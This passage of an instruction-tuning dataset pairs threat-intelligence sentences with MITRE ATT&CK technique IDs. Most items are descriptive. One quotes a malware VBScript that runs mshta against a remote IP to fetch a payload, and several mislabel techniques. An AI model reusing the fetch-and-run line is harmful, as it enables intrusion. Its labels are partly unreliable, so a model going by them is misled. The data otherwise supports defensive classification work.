Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor's dispatcher can modify the Run registry key.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AutoIt backdoor has sent a C2 response that was base64-encoded.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Like other objects in AD, GPOs have access controls associated with them.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware WhiskeyAlfa-Three modifies sector 0 of the Master Boot Record to ensure that the malware will persist even if a victim machine shuts down.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,pass-the-ticket### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has distributed cryptomining malware.### Assistant: T1496: Resource Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once credentials are obtained, they can be used to perform lateral movement and access restricted information.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has used the Farse6.1 utility to extract credentials from lsass.exe.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore prompts the user for their credentials.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobian RAT has a feature to perform keylogging on the victim’s machine.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba can use the command cmd.exe /c del to delete its artifacts from the system.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mosquito’s installer is obfuscated with a custom crypter to obfuscate the installer.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The XSL script contains additional hard coded variables sVarRaz and sVar2RazX, which contain file paths that direct to the downloaded files.  The file’s path### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has obtained and used open-source tools such as Mimikatz, gsecdump, and Windows Credential Editor.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif droppers have used VBA macros to download and execute the malware's full executable payload.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cadelspy’s main payload contains its back door functionality, allowing the threat to carry out the following activities: Log keystrokes and the titles of open windows Gather clipboard data and system information Steal printer information and any documents that were sent to be printed Record audio Capture screenshots and webcam photos Cadelspy compresses all of the stolen data into a .cab file and uploads it to the attacker’s C&C servers### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The following code example shows the false flag being set (5 > 115) and the ETransaksi.diomadnfagaghagh method being called:  int num = 5; int num2 = 155; bool flag = num > num2; if (flag) { } else { NewLateBinding.LateCall(ETransaksi.diomadnfagaghagh(), null, ""Invoke"", new object[] { null, new object[0] }, null, null, null, true);The payload uses this technique to run a chain of methods that eventually carry out its malicious task### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Revenge RAT has the ability to access the webcam.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer can use WMI to log into remote machines for propagation.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Add-MailboxPermission PowerShell cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,list /Users command can be used to enumerate local accounts.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to find unsecured credentials in Group Policy Preferences .### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Anyconnect[.]stream Bigip[.]stream Fortiweb[.]download Kaspersky[.]science microtik[.]stream owa365[.]bid symanteclive[.]download windowsdefender[.]win The listed C2 servers all resolved to IPs belonging to a service provider in China at 1.2.9.0/24, which is the IP address used by the C2 server to send a cancel communications message to the end system### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If this file exists, the content is read in order to obtain a path to find a second file with the LNK (link) extension### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Azorult can call WTSQueryUserToken and CreateProcessAsUser to start a new process with local system privileges.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk has stopped services related to anti-virus.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,During its initial execution, BACKSPACE extracts operating system information from the infected host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The “upload” command downloads files from the CnC and saves them locally in “C:\ProgramData“### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TSCookie has the ability to identify the IP of the infected host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team defaced approximately 15,000 websites belonging to Georgian government, non-government, and private sector organizations in 2019.### Assistant: T1491: Defacement" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SamSam encrypts victim files using RSA-2048 encryption and demands a ransom be paid in Bitcoin to decrypt those files.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In practice this is nearly every program, since user32.dll is a very common library.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If that HTTPS request is not successful, the downloader will issue an HTTP request### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has used FTP to exfiltrate collected data.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dipsind encodes C2 traffic with base64.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, attackers may exploit a Server-Side Request Forgery vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The selection of the target process is influenced by the security software that is installed on the system .### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has used tools to automatically collect system and network configuration information.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shims can also be abused to establish persistence by continuously being invoked by affected programs.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can also change configuration settings within the AD environment to implement a Rogue Domain Controller.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some InnaputRAT variants create a new Windows service to establish persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CHOPSTICK checks for antivirus and forensics software.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Firstly, the Trojan will use the following regular expression to determine if the C2 server wishes to cancel the C2 communications: 216.58.192.174|2a00:1450:4001:81a::200e|2200::|download.microsoft.com|ntservicepack.microsoft.com|windowsupdate.microsoft.com|update.microsoft.com Additionally, the RogueRobin Trojan uses the regular expressions in Table 3 to confirm that the DNS response contains the appropriate data for it to extract information from### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 actors continue to deliver the malicious attachments via spear-phishing emails### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ObliqueRAT can halt execution if it identifies processes belonging to virtual machine software or analysis tools.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 3 Countries in which OopsIE will run in based on the time zone Notable Differences The OopsIE Trojan delivered in this attack had functional code that was very similar to the OopsIE variant discussed in our previous blog### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SPACESHIP achieves persistence by creating a shortcut in the current user's Startup folder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS has encrypted C2 traffic with RSA.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,tasklist /svc ### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 used Kerberos ticket attacks for lateral movement.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QUADAGENT was likely obfuscated using Invoke-Obfuscation.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used legitimate credentials to gain initial access, maintain access, and exfiltrate data from a victim network.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has exploited multiple Microsoft Office and .NET vulnerabilities for execution, including CVE-2017-0199, CVE-2017-8759, and CVE-2017-11882.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LiteDuke can securely delete files by first writing random data to the file.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The QakBot proxy module can encapsulate SOCKS5 protocol within its own proxy protocol.### Assistant: T1572: Protocol Tunneling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A user's service tickets or ticket granting ticket may be obtained, depending on the level of access.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay has been delivered using OLE objects in malicious documents.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windigo has used a script to check for the presence of files created by OpenSSH backdoors.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather information about the victim's host software that can be used during targeting.### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has used the Windows service winmgmts:\\.\root\SecurityCenter2 to check installed antivirus products.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FELIXROOT collects the victim’s computer name, processor architecture, OS version, volume serial number, and system type.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID , a unique identification number used to identify COM objects.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used malware to obtain a list of running processes on the system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They also primarily used IP addresses originating from the same country as the victim for their VPN infrastructure.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbon uses the net view command.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has sent malicious files requiring direct victim interaction to execute.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It has also disabled Windows Defender's Real-Time Monitoring feature and attempted to disable endpoint protection services.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has used tools to compress data before exfilling it.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.### Assistant: T1496: Resource Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 gained initial network access via a trojanized update of SolarWinds Orion software.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Part of APT28's operation involved using CHOPSTICK modules to copy itself to air-gapped machines and using files written to USB sticks to transfer data and command traffic.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kwampirs collects password policy information with the command net accounts.### Assistant: T1201: Password Policy Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework., AmmyAdmin### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RC scripts require root privileges to modify.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor can conduct Active Directory reconnaissance using tools such as Sharphound or AdFind.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Xbash can create a cronjob for persistence if it determines it is on a Linux system.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rising Sun can archive data using RC4 encryption and Base64 encoding prior to exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are tools available to perform these changes.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 can perform brute force attacks to obtain credentials.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used PowerShell to execute commands/scripts, in some cases via a custom executable or code from Empire's PSInject.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackEnergy has the capability to communicate over a backup channel via plus.google.com.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malware used by Group5 is capable of watching the victim's screen.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon can change the modified time for files to evade forensic detection.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 7: Property list file in LaunchAgents directory To camouflage the location of the malicious file, Keydnap replaces argv[0] with /usr/libexec/icloudsyncd –launchd netlogon.bundle### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record .### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about the client configurations may also be exposed to adversaries via online or other accessible data sets .### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When exfiltrating the keychain, the keychain field is used instead of data### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HyperStack has used RSA encryption for C2 communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has attempted to get users to launch malicious Microsoft Word attachments delivered via spearphishing emails.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Naikon has used DLL side-loading to load malicious DLL's into legitimate executables.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Prikormka encodes C2 traffic with Base64.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak has downloaded a variety of modules and payloads to the compromised host, including IcedID and Ursnif.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil can exfiltrate host and malware information to C2 servers.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT1 has collected files from a local victim.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GOLD SOUTHFIELD has staged and executed PowerShell scripts on compromised hosts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nerex creates a backdoor through which remote attackers can download files onto a compromised host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emissary has the capability to execute gpresult.### Assistant: T1615: Group Policy Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mosquito uses COM hijacking as a method of persistence.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted until execution.### Assistant: T1620: Reflective Code Loading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,mshta### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses.### Assistant: T1578: Modify Cloud Compute Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook can support commands to execute Java-based payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ragnar Locker has used cmd.exe and batch scripts to execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent can delete previously created tasks on a compromised host.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Both files require root access to read.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX_OCEANLOTUS.D can collect the network interface MAC address on the infected host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stolen Pencil has a tool to sniff the network for passwords.### Assistant: T1040: Network Sniffing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM has the ability to remove Registry entries that it created during execution.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FruitFly will delete files on the system.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework., net session### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Taidoor can upload data and files from a victim's machine.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SynAck can manipulate Registry keys.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has used scripts to collect the host's network topology.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Night Dragon has copied files to company web servers and subsequently downloaded them.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has collected information automatically using the adversary's USBferry attack.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT has also used a unique password to decrypt the file used for its hidden file system.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kinsing has used the find command to search for specific files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LNK files have been valuable during Mandiant incident response investigations as they include volume serial number, NetBIOS name, and MAC address### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound malware has used a PowerShell command to check the victim system architecture to determine if it is an x64 machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary must already be in a privileged user context administrator to steal a token.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Other functionalities provided by this section of the PowerShell Script are as follows: Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables: IP Address from Network Adapter Configuration OS Name OS Architecture Computer Name Computer Domain Name Username All of this data is concatenated and formatted as shown in Figure 13: Figure 13: Concatenated and formatted data retrieved by PowerShell script Register the victim’s machine to the C2 server by sending the REGISTER command to the server### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Based on the application, this could result in privilege escalation and uninhibited network access.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ChChes copies itself to an .exe file with a filename that is likely intended to imitate Norton Antivirus but has several letters reversed .### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has password-protected malicious Word documents and used base64 encoded PowerShell commands.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The embedded VBScript is retrieved from a resource and decrypted using the same algorithm as discussed above, which results in the following cleartext: set objshell = createobject(\""wscript.shell\"")objshell.run \""mshta hxxp://86.106.131.177:6500/zIZFh\"",vbhide The Koadic C2 server will respond to this request with Javascript code that acts as the Koadic staging payload, which allows the actor to run additional Koadic modules on the end system to carry out their post-exploitation activities### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 has used WinRM via PowerShell to execute command and payloads on remote hosts.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MiniDuke can enumerate local drives.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FatDuke can secure delete its DLL.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Next, to the beginning of the BASE64 string a random BASE64 string with the length of 5 characters is added### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the victim is using PowerShell 3.0 or later, POWERSOURCE writes its decoded payload to an Alternate Data Stream named kernel32.dll that is saved in %PROGRAMDATA%\Windows\.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BBSRAT can list running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A common use of this technique is with Spearphishing Attachment/Malicious File since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hydraq creates a backdoor through which remote attackers can clear all system event logs.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Melcoz has been spread through malicious links embedded in e-mails.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Linfo creates a backdoor through which remote attackers can obtain data from local systems.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has been known to stage files for exfiltration in a single location.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,We have seen the following HTTP POST parameters within the Zebrocy C++ samples: porg structOne oq volume DDE Details The author of the DDE document used in the February 2018 attacks used some obfuscation techniques in an attempt to evade detection### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SQLRat has used been observed deleting scripts once used.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BadPatch establishes a foothold by adding a link to the malware executable in the startup folder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WINERACK can enumerate processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound malware has communicated with its C2 server over TCP port 4443 using HTTP.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through External Remote Services and Valid Accounts or as part of the initial compromise by exploitation of the externally facing web service.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has distributed targeted emails containing links to malicious documents with embedded macros.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has the ability to use a reverse SOCKS proxy module.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RGDoor uploads and downloads files to and from the victim’s machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NDiskMonitor obtains the victim username and encrypts the information to send over its C2 channel.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BendyBear is designed to download an implant from a C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EvilBunny has downloaded additional Lua scripts from the C2.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse the right-to-left override character to disguise a string and/or file name to make it appear benign.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Environment variables, such as %USERNAME% and $USER, may also be used to access this information.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLINDINGCAN has used Rundll32 to load a malicious DLL.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLACKCOFFEE has the capability to discover processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Screenshot provided in leak showing administrative panel for hosting provider Berbid Server The screenshot showed the administrative panel for a VPS account on DeltaHost with four different virtual servers, as seen in Figure 20### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT34 has used brute force techniques to obtain credentials.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse verclsid.exe to proxy execution of malicious code.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can use Rundll32.exe to enable C2 communication.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SDBbot has the ability to decrypt and decompress its payload to enable code execution.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries who have the password hash of a target service account may forge Kerberos ticket granting service tickets, also known as silver tickets.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once the victim downloads and executes the email attachment, it runs silently with no additional decoy documents or decoy dialog boxes### Assistant: T1105: 